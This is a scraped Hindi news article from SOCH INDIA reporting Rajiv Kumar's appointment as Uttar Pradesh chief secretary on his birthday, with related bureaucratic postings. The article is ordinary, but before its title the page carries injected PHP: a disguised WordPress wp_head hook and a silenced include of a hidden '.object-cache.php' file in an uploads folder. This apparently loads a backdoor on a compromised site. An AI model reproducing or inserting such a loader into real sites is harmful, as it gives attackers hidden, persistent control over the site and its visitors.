add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); जन्मदिन पर राजीव कुमार को यूपी के मुख्य सचिव पद का तोहफा – SOCH INDIA
Menu

राजनीति
जन्मदिन पर राजीव कुमार को यूपी के मुख्य सचिव पद का तोहफा

nobanner

प्रदेश में योगी आदित्यनाथ सरकार के कार्यभार संभालने के करीब सौ दिन बाद मुख्य सचिव बदला है। उत्तर प्रदेश के नये मुख्य सचिव राजीव कुमार ने आज अपना कार्यभार ग्रहण किया है।
वरिष्ठ आइएएस अधिकारी राजीव कुमार का आज जन्म दिन है। आज ही उनको उत्तर प्रदेश का मुख्य सचिव नियुक्त किया गया है। जन्मदिन पर उनको शानदार तोहफा मिला है। आज उन्होंने लाल बहादुर शास्त्री भवन (एजेक्सी) में जाकर अपना कार्यभार ग्रहण किया।
राजीव कुमार 1981 बैच के आइएएस अधिकारी है। मिर्जापुर में सहायक मजिस्ट्रेट 23 जून 1982 के रूप में उन्होंने उत्तर प्रदेश में अपना काम शुरू किया था। उनकी करीब 12 वर्ष बाद उत्तर प्रदेश में वापसी हुई है। राजीव कुमार ने आज राहुल भटनागर से मुख्य सचिव का काम संभाला है। वरिष्ठ आईएएस राजीव कुमार यूपी के मुख्य सचिव बनाए गए हैं।
आदेश होते ही राजीव कुमार कार्यभार ग्रहण करने एनेक्सी पहुंच गए। राजीव कुमार से मिलने के लिए कई अफसर पहुंचे। इनमें प्रमुख सचिव गृह, सूचना, प्रमुख सचिव नियुक्ति एक साथ पहुंचे। इससे पहले सुबह ही सीनियर आईएएस राजीव कुमार के राजधानी के वीवीआईपी गेस्ट हाउस पहुंचने से सरगर्मियां तेज हो गई थीं। राजीव कुमार से मिलने के लिए कई अधिकारियों का तांता लगा हुआ था। इनमें प्रमुख सचिव गृह अरविंद कुमार, अपर मुख्य सचिव राजीव तिवारी, प्रमुख सचिव सूचना अवनीश अवस्थी रहे।
डीएम और एसपी मिलकर काम करें
1981 बैच के आईएएस राजीव कुमार ने कार्यभार ग्रहण करने के बाद पत्रकारों से कहा कि डीएम और एसपी मिलकर काम करें। वह योजनाएं बनाकर काम करें और कानून व्यवस्था को प्राथमिकता दें। राजीव ने कहा कि किसी भी योजना को समर्पण भावना से करने से सफलता जरूर मिलती है। लखनऊ में पढ़े-लिखे राजीव कुमार ने कहा कि मुखिया के रूप में यहां काम करना मेरे लिए गौरव की बात है।
राजीव कुमार 1981 बैच के आईएएस अफसर हैं।पिछले दिनों ही राजीव कुमार को केंद्र ने समय से पहले ही यूपी वापसी की मंजूरी दी थी। राजीव कुमार की छवि एक ईमानदार और कर्मठ अधिकारी के तौर पर है। यही वजह है कि पीएम नरेंद्र मोदी यूपी में प्रचंड बहुमत के बाद ऐसे ऑफिसर की नियुक्ति करना चाहते हैं जो उनके चुनावी वादों को जल्द से जल्द अमली जामा पहना सके। राजीव कुमार उत्तर प्रदेश के ही रहने वाले हैं और जून 2018 में रिटायर होने वाले हैं।
बुलंदशहर के रहने वाले राजीव कुमार फिरोजाबाद, मथुरा समेत कई जिलों के डीएम रहे हैं। प्रमुख सचिव ग्राम विकास के साथ-साथ उन्हें लंबे समय तक केंद्रीय कैबिनेट सचिवालय में भी तैनात रहने का अनुभव है। उनका कार्यकाल अब सिर्फ एक साल बचा है। यही वजह थी कि वह यूपी नहीं आना चाहते थे। राजीव कुमार अपनी सकारात्मक छवि को लेकर यूपी नहीं आना चाहते थे लेकिन बाद में उन्हें मना लिया गया। इनसे पहले 1981 बैच के ही अनिल स्वरुप का नाम भी मुख्य सचिव की रेस में था। इनसे सीनियर 1980 बैच के शैलेश कृष्णा का भी नाम चर्चा में था, लेकिन उनकी तबियत खराब है।
राहुल भटनागर नोएडा के अध्यक्ष
उत्तर प्रदेश के मुख्य सचिव रहे राहुल भटनागार को नोएडा का अध्यक्ष नियुक्त किया गया है। उनको निवेश आयुक्त का अतिरिक्त चार्ज दिया गया। निवेश आयुक्त का अतिरिक्त चार्ज देवाशीष पाण्डा के पास था। राहुल भटनागर ग्रेटर नोएडा प्राधिकरण के चेयरमैन बनाये गए। यह पद पहले मेरठ के कमिश्नर प्रभात कुमार के पास था। प्रदेश के प्रमुख सचिव नियुक्ति के पद पर दीपक त्रिवदी को तैनात किया गया है। इस पद को संभाले रहे कामरान रिजवी को एमडी ट्रांसमिशन, शक्ति भवन में नियुक्ति मिली है।